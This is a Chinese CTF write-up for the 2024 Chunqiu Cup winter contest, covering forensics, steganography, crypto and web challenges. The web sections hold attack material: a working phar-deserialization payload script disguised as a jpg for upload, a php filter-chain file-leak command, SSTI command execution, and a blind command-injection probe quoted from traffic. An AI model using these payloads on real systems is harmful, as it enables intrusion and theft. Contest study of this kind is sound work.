2024-春秋杯冬季赛
Misc
简单算术
题目提示异或,直接把开头字符 y 与 f 异或,得到的是不可见字符,base64 编码一下得到异或的字符,将给出的每一个字符与编码后的结果异或即可得到 flag
import base64
result = chr((ord("y") ^ ord("f")))
result_bytes = result.encode('utf-8')
encoded = base64.b64encode(result_bytes)
print(encoded)
flag 值:flag{x0r_Brute_is_easy!}
See anything in these pics?
首先识别 Aztec 码得到解压密码
解压后一张 jpg 图片,查看文件尾发现有个 png 文件
formost 分离然后修复图片宽高即可得到 flag
flag 值:flag{opium_00pium}
简单镜像提取
一个流量包,放入随波逐流发现流量中包含 zip 文件,formost 分离出 zip
得到一个 img 镜像文件,搞了半天没找到,于是再次放入随波逐流 formost 分离,得到一个 xls 文件,打开即可得到 flag
flag 值:flag{E7A10C15E26AA5750070EF756AAA1F7C}
压力大,写个脚本吧
压缩包套娃解密,每层的密码都要先 base64 解一下才是真正的密码,脚本如下:
import os
import zipfile
import base64
def extract_zip(zip_path, password):
with zipfile.ZipFile(zip_path) as zf:
zf.extractall(pwd=password.encode('utf-8'))
print(f"成功解压: {zip_path}")
return True
def main():
for i in range(99, -1, -1): # 从 99 到 0
zip_name = f"zip_{i}.zip"
password_file = f"password_{i}.txt"
with open(password_file, 'r') as f:
encoded_password = f.read().strip()
password = base64.b64decode(encoded_password).decode('utf-8')
print(f"正在解压 {zip_name},使用密码: {password}")
if not extract_zip(zip_name, password):
break
if __name__ == "__main__":
main()
解密之后有一个 hint.txt,内容为 PASSWORD+PASSWORD.png
也就是解压密码连起来是一张图片,写脚本如下:
import os
import base64
def merge_passwords():
merged_data = ""
for i in range(100):
password_file = f"password_{i}.txt"
with open(password_file, 'r') as f:
merged_data += f.read().strip()
data = base64.b64decode(merged_data).decode('utf-8')
return data
if __name__ == "__main__":
data = merge_passwords()
with open("merged_passwords.txt", 'w') as f:
f.write(data)
将得到的 16 进制文本复制到 010 转化为图片,是一张二维码,扫码得到 flag
flag 值:flag{_PASSWORDs_is_fl@g!_}
ez_forensics(复现)
首先使用 Lovelymem 工具挂载
翻到一个 hint.txt,提示 60 = ( ) + ( ),和羊城杯一样,rot13+rot47,解码得到提示,7z 密码是从 hashdump 中得到的
不知道为啥 7z 文件是空的,使用另一个软件 R-Studio 挂载镜像,恢复 f14g.7z 文件,密码使用 hashdump 命令查到 Flu0r1n3 用户的密码,cmd5 查到明文
解压得到一个提示和一个 ini 配置文件,提示是 ssh 连接,ini 文件是 MobaXterm 的配置文件,需要用到一个项目恢复密码,项目地址如下:
https://github.com/HyperSine/how-does-MobaXterm-encrypt-password
ini 文件里的密码配置文件如下:
把 flag_is_here 当作主密码来显示出 root 用户密码,命令如下:
python MobaXtermCipher.py dec -p flag_is_here DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL
执行命令,然后把大括号里的内容 base64 解密一下,得到 flag
flag 值:flag{you_are_a_g00d_guy}
Weevil's Whisper
webshell 流量分析,首先过滤 http 协议,发现先是上传了一个 shell.php,然后再连接 webshell 进行命令执行
右键追踪 tcp 协议,可以看到上传的 webshell,如下
分析 webshell 逻辑编写解密脚本,然后将命令执行的结果逆向解密,最后一个包解密后就是 flag
解密脚本如下:
<?php
$key = "161ebd7d";
function xorEncryptDecrypt($input, $key) {
$keyLength = strlen($key);
$inputLength = strlen($input);
$output = "";
for ($i = 0; $i < $inputLength;) {
for ($j = 0; $j < $keyLength && $i < $inputLength; $j++, $i++) {
$output .= $input[$i] ^ $key[$j]; // 逐字符 XOR 运算
}
}
return $output;
}
$response = "lFDu8RwONqmag5ex45089b3446eeSap6risomCodHP/PqrQaqvueeU+wURkueAeGLStP+bQE+HqsLq39zTQ2L1hsAA==4e0d86dbcf92";
$prefix = "lFDu8RwONqmag5ex";
$header = "45089b3446ee";
$footer = "4e0d86dbcf92";
$encryptedData = substr($response, strlen($prefix) + strlen($header), -strlen($footer));
$base64Decoded = base64_decode($encryptedData);
$decryptedData = xorEncryptDecrypt($base64Decoded, $key);
$uncompressedData = gzuncompress($decryptedData);
echo $uncompressedData;
?>
flag 值:flag{arsjxh-sjhxbr-3rdd78dfsh-3ndidjl}
NetHttP
给了一个流量包,过滤 http 协议,一眼看出是 ssti 命令执行的攻击
看他执行的命令结果,流 1 是一个 ssti 漏洞,给出了一个 SECRET_KEY
from flask import Flask,request,render_template_string,Response,session
app = Flask(__name__)
app.config['SECRET_KEY'] = 'gdkfksy05lx0nv8dl'
@app.route("/")
def index():
return open(__file__).read()
@app.route("/rce",methods=["GET"])
def rce():
data = request.args.get("name","Guest")
return render_template_string(f"Welcome {data}")
if __name__ == "__main__":
app.run(host="0.0.0.0",port=8989,debug=False)
在流 13 找到了一个加密了的私钥,尝试使用 SECRET_KEY 解密私钥发现刚好能解
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIC1DBOBgkqhkiG9w0BBQ0wQTApBgkqhkiG9w0BBQwwHAQIirzza4niI8QCAggA
MAwGCCqGSIb3DQIJBQAwFAYIKoZIhvcNAwcECEXSIcOIuwGaBIICgHLW3Qb39/+E
0uKiOi8yevcztF5toCOGsh6Fi23zSIwCjH8VPO1lbpFCkW9789ldbxBbSwtXwMmF
kTyFjOmymL/zktmt8PyExcWOGA481/IkpCPTmKAT8+67FJEdAf9BAZVPjqpu1Lla
Ohnp3JFZ8SStSUWwvjLZafi4Ucf7ajJexwCTkkvB7mF8kostYaBOsNJ1GORRdL3c
s73GxvX98MTLvF1DW5xujgdcl28msB3GHTxe7sSgScKfFUyfCViivW8FCqa6lfJo
Tj3JZtNlpPiOr1PXPfIWBt0wEQaF3+ovTEVu7x1r1Q3mq61GpO3s4n6kdeGg9Dkp
BYErmG76JdZtOWTZ88SrD7EDkh12EOdtM0ywR1DTYk4+fjKifkhPPrIGn8Nm07PE
yTAS7UG0Ut2Ut722rOBsgIZlnk2vF8qbIvKJj1JGzedMLabnafF5/L2N4wP8ZeL8
fO1Asxy0o/Hk89rl7ZI8Aocc1ZRMHKfxg/XV2bFHv2q1M1y3CI9wUrGnvk+8oX0H
T/5vFtfGb4QNiy+p6aTi+UEJOau5O0t4f2kAL6L/pgmLEMulKWVMK8u+p6os0cbt
KbVBmjNE/uA8SCv8E9XcL+/LWsSVInrYwJQzWbLIYx5FTRk4479taV3BGEN+hbmU
RqlIK8IwsVxWc4wC+oHoLMY4RllUZ9D2rBasMt6DOLA31Jjrabciv03zJPyqXcfi
DVTFu9JfT1fF7eOClQzTvIlTDVIDMPfAqR6B+/AbZDiQ2aK/54i10kohmXT2qWoT
pDYPWV2JGTXICaRyP8FYu26ZTdIKVB3PovfJEXR3yex14U5T8zFVpUQnoDJfNyPG
qUVmlGScmkU=
-----END ENCRYPTED PRIVATE KEY-----
接下来就只剩下密文了,首先分析一下命令,如果截取的字符等于给出的字符,就会回显一个 rce,猜测 m5 文件就是密文,根据回显情况来判断出 m5 文件的内容
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 1) == 'U' ]; then echo "rce";fi
我的思路是:先提取出回显是 Welcome rce 的请求包,再提取请求包的参数值,接着 base64 解码,正则获取到 cut -c 命令判断出来的字符,拷打 GPT 得到脚本
这里贴一个提取并合并请求包的 ps1 脚本吧,其他操作比较简单,自行操作即可
$inputFile = "NetHttP.pcapng"
$outputDir = "output"
$mergedFile = "merged_output.pcap"
if (-not (Test-Path $outputDir)) {
New-Item -ItemType Directory -Path $outputDir
}
$streams = tshark -r $inputFile -Y 'http contains "Welcome rce"' -T fields -e tcp.stream | Sort-Object -Unique
foreach ($stream in $streams) {
tshark -r $inputFile -Y "tcp.stream eq $stream" -w "$outputDir\output_stream_$stream.pcap"
}
$outputFiles = Get-ChildItem -Path $outputDir -Filter "output_stream_*.pcap" |
Sort-Object { [int]($_ -replace '^.*_(\d+)\.pcap$', '$1') }
if ($outputFiles.Count -gt 0) {
$fileList = $outputFiles.FullName -join " "
mergecap -w "$outputDir\$mergedFile" $fileList
Write-Host "合并完成!结果已保存到 $outputDir\$mergedFile。"
}
之后使用 tshark 提取 name 参数的值
tshark -r NetHttP.pcapng -Y "http.request.method == GET && http.request.uri.query" -T fields -e http.request.uri.query bas| Select-String -Pattern "name=([^&]*)" -AllMatches | ForEach-Object { $_.Matches.Groups[1].Value } > names.txt
再写脚本正则提取即可得到 base64 编码的密文,如下
UzBJM2lXaHZzektiT00vT2FsS1RBMGZwbTVPNWNoVlZuWUd5S2Q1blY0ZXJBelJiVjZWNnc4Yi9VaU9mUUVjM0lqaDAwaEZqWUZVMUhheE51YjlHbmxQUy9sY2FtNW1BVGtmMnNKUzZKZ3BKbzZBU2hWUnhXRFlLS3JvamVVZUJaajVNRVBJOC80REdHR3VIRnhteDJieEFhaGREZTFjR25qVFpHV09OcE5JPQRmFrZSBGTGFnCm5vIGhlcmUK==
将base64 编码的密文解码一下,然后使用 cyberchef 进行 rsa 解密即可得到 flag
flag 值:flag{343907d2-35a3-4bfe-a5e1-5d6615157851}
音频的秘密
根据提示说 wav 隐写为 deepsound 加密,密码为弱口令,我们使用 deepsound 提取隐藏的文件,密码为 123(试了好久),deepsound2john.py 爆破不出来估计是版本问题
提取出来后还是加密的压缩包,尝试爆破未果后查看加密方式,发现压缩方式是 store,加密方式是 ZipCrypto,所以可以使用明文攻击破解压缩包,命令如下:
bkcrack.exe -C flag.zip -c flag.png -p pngheader -o 0
bkcrack.exe -C flag.zip -k 29d29517 0fa535a9 abc67696 -U 123.zip 123
解压得到一张图片,使用 Stegsolve 工具提取一下通道数据即可得到 flag
flag 值:flag{Y1_Shun_jian_Fa_ZE_Dian_Fu}
Web
easy_flask
随便输入账号登陆,一眼 ssti,直接使用 fenjing 工具一把梭,执行命令得到 flag
flag 值:flag{48ad0cde8345c8b2608933ac4e85147e}
file_copy(复现)
直接用项目跑,项目地址如下:
https://github.com/synacktiv/php_filter_chains_oracle_exploit
项目描述如下,只要使用了列举出的这些函数,就可以在服务器不返回文件内容的情况下泄露文件内容
然后用命令跑就行了,跑太慢我就不跑了,你知道就好(
python filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path
easy_code
进入页面是 2048 小游戏,玩了一会发现没什么信息,尝试访问 /robots.txt,发现泄露的有文件路径
访问 /gogogo.php,是一个套了三层的 php 绕过
第一层:浮点型转整型溢出,浮点型转整形如果溢出就会造成精度损失,666.99999999999999999 会被转成 667,从而绕过第二个和第三个过滤
第二层:一个简单的 cookie 传参,直接传入 pass=admin 即可
第三层:具体逻辑如下:
if (preg_match("/^(?:.*(?:base|rot13|input|data|flag|file|2|5|base64|log|proc|self|env).*)$/i", $file)) {
echo "prohibited prohibited!!!!";
} else {
echo "试试read.php";
include($file);
}
过滤了一些输入输出流,如果绕过就进行文件包含,包含 read.php 文件,我们可以利用伪协议读文件,不过部分过滤器被限制了,使用其他过滤器绕过限制,具体过滤器可以参考这篇文章
https://developer.aliyun.com/article/1478688
将文章给的过滤器放到 burp 里爆破一下,按照响应包长度排序,查看响应包,得到 base64 编码的 flag
base64 解码即可得到 flag
flag 值:flag{d91ea23e927b0e2dca64624cf4c867ca}
easy_php
进入首页下载网站源码,发现是 phar 反序列化,找到一道差不多一模一样的原题
https://blog.csdn.net/qq_51584770/article/details/121218448
文件都一样,功能都一样,难绷,只改了两个地方
一个是 class.php 里的一个类名 C1e4r 换成了 Chunqiu,另一处是 flag 的位置,改到了根目录
修改原题 payload 如下:
<?php
class Chunqiu {
public $test;
public $str;
}
class Show {
public $source;
public $str;
}
class Test {
public $file;
public $params;
public function __construct() {
$this->params = array('source'=>'/flag');
}
}
$c = new Chunqiu();
$s=new Show();
$t =new Test();
$s->source=$s;
$s->str['str']=$t;
$c->str=$s;
echo(serialize($c));
$phar = new Phar("exp.phar"); //.phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); //固定的
$phar->setMetadata($c); //触发的头是C1e4r类,所以传入C1e4r对象
$phar->addFromString("exp.txt", "test"); //随便写点什么生成个签名
$phar->stopBuffering();
?>
将生成的 exp.phar 文件后缀改成 jpg 绕过 waf 检测,然后在 /upload_file.php 上传
虽然乱码了,但应该是成功了,访问 /upload/ 找到上传后的文件
在/file.php 使用 phar 协议读文件,触发反序列化,base64 解码得到 flag
flag 值:flag{a16dcb7549915546893a27a6d7927615}
Crypto
你是小哈斯?
下载题目内容得到一串 hash 列表,先把第一个放到 cmd5 网站查看是哪种 hash,可以看到是 sha1
写脚本对每一行 hash 进行单字符爆破,得到 flag
import hashlib
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|;:,.<>?/~`"
# 爆破单个字符
def crack_hash(target_hash):
for char in characters:
# 计算当前字符的哈希值
hash_value = hashlib.sha1(char.encode()).hexdigest() # 使用 SHA-1
# 比较哈希值
if hash_value == target_hash:
print(f"找到匹配的字符: {char} (哈希值: {target_hash})")
return char
# 读取文件并逐行爆破
result_str = ""
with open("题目内容.txt", "r") as file:
for line in file:
target_hash = line.strip()
if target_hash:
char = crack_hash(target_hash)
if char:
result_str += char
# 输出最终的字符串
print(result_str)
最终跑出来的结果是:
1234567890-=qwertyuiopflag{no_is_flag}asdfghjklzxcvbnm,flag{game_cqb_isis_cxyz}.asdfghjklzxcvbnm,.qwertyuiopflag{no_is_flag}1234567890-=
flag 值:flag{game_cqb_isis_cxyz}
通往哈希的旅程
给出一串 hash ca12fd8250972ec363a16593356abb1f3cf3a16d,要求爆破 11 位手机号,写脚本爆破,运行脚本即可得到对应的手机号码,脚本如下:
import hashlib
# 目标哈希值
target_hash = "ca12fd8250972ec363a16593356abb1f3cf3a16d"
# 手机号前缀
prefix = "188"
# 爆破手机号的后 8 位
for i in range(0, 100000000): # 8 位数字范围是 00000000 到 99999999
# 生成手机号
phone_number = prefix + f"{i:08d}" # 补零到 8 位
# 计算 SHA-1 哈希值
hash_value = hashlib.sha1(phone_number.encode()).hexdigest()
# 比较哈希值
if hash_value == target_hash:
print(f"找到匹配的手机号: {phone_number}")
break
# 打印进度(可选)
if i % 1000000 == 0: # 每 100 万次打印一次进度
print(f"已尝试: {i} 次")
else:
print("未找到匹配的手机号。")
flag 值:flag{18876011645}
funny_rsa
本题推导部分就是简单的高中数学,题目给了四个运算结果
利用 funny2 和 funny3 可以推出 n
funny1 可以近似推导出 p 和 q,random_offset 在 [-1025, 1025] 之间,直接爆破,然后解方程 x^2 - (p+q)x + p*q = 0 得到 p 和 q
然后就是正常的解rsa步骤了,脚本如下:
import math
from Crypto.Util.number import bytes_to_long, long_to_bytes, inverse
funny1 = int("-17696257697673533517695215344482784803953262308315416688683426036407670627060768442028628137969719289734388098357659521255966031131390425549974547376165392147394271974280020234101031837837842620775164967619688351222631803585213762205793801828461058523503457022704948803795360591719481537859524689187847958423587638744086265395438163720708785636319741908901866136858161996560525252461619641697255819255661269266471689541673348377717503957328827459396677344554172542244540931545166846117626585580964318010181586516365891413041095399344533013057011854734701706641516027767197631044458866554524544179750101814734153116374") # 替换为实际 Funny 1 值
funny2 = int("23686728880494758233026798487859622755203105120130180108222733038275788082047755828771429849079142070779731875136837978862880500205129022165600511611807590195341629179443057553694284913974985006590617143873019530710952420242412437467917519539591683898715990297750494900923245055632544763410401540518654522017115269508183482044872091052235608170710105631742176900306097734799793264202179181242015892763311753674799273300604804820015447161950996038795518844564861004398396796284113803759208011") # 替换为实际 Funny 2 值
funny3 = int("419166458284161364374927086939132546372091965414091344286510440034452974193054721041229068769658972346759176374539266235862042787888391905466876330331208651698002159575012622762558316612596034044109738533275009086940744966244759977014078484433213617582101347769476703012517531619023366639507114909172774156647998737369356116119513795863130218094614475699956104117183821832339358478426978211282822163928764161915824622224165694904342224081321345691796882691318330781141960650263488927837990954860719950761728580780956673732592771855694502630374907978111094148614378212006604233062606116168868545120407836000858982789824582335703891535021579560434875457656655941164757860852341484554015214879991896412137447010444797452119431147303295803678311972500421396900616845556636124424993090559354406417222700637726789045926994792374756038517484548544506630672251868349748176389591615802039026216656891403871728516658502023897343287181822303758976641229952646993446276281728919020747050486979968215989594984778920359425264076558022228448529089047021814759587052098774273578311709416672952218680244714492318709603579024") # 替换为实际 Funny 3 值
funny4 = int("13541898381047120826573743874105965191304100799517820464813250201030319771155430755606644860103469823030581858410957600027665504533335597988508084284252510961847999525811558651340906333101248760970154440885012717108131962658921396549020943832983712611749095468180648011521808106480590665594160479324931351996812185581193608244652792936715504284312172734662364676167010674359243219959129435127950232321130725013160026977752389409620674167037650367196748592335698164875097139931376389630867192761783936757260359606379088577977154378217235326249540098268616890307702288393952949444753648206049856544634755301197410481479") # 替换为实际 Funny 4 值
n = (funny3 + 1025) // funny2
found = False
for offset in range(-1025, 1026):
p_plus_q = funny1 + n - offset
discriminant = p_plus_q**2 - 4 * n
if discriminant < 0:
continue
sqrt_discriminant = math.isqrt(discriminant)
p = (p_plus_q + sqrt_discriminant) // 2
q = (p_plus_q - sqrt_discriminant) // 2
if p * q == n:
found = True
break
phi_n = (p - 1) * (q - 1)
e = 65537
d = inverse(e, phi_n)
hint_long = pow(funny4, d, n)
m_long = funny2 // hint_long
print(long_to_bytes(hint_long))
print(long_to_bytes(m_long))
但是运行得到的却是一个假 flag,hint 说玄机就在数字里面
b'Of course, So good, and enjoy the funny number, it is true flag'
b'fake:flag{5044833682931814367881036090727702841234957943094051805420875375031047763007750978962055801191968383860156687597666360268370292861}'
尝试把假 flag 里的内容长整数转字符,即可得到真正的 flag
from Crypto.Util.number import long_to_bytes
flag = 5044833682931814367881036090727702841234957943094051805420875375031047763007750978962055801191968383860156687597666360268370292861
print(long_to_bytes(flag))
flag 值:flag{aB3-CdE7_FgH9-iJkLmNoPqRsT-UvWxYz1234567890}
最近搭了一个博客,以后wp之类的就直接发博客了,地址:Liebert77の博客
原文地址:https://blog.csdn.net/2301_80185313/article/details/145268362
免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!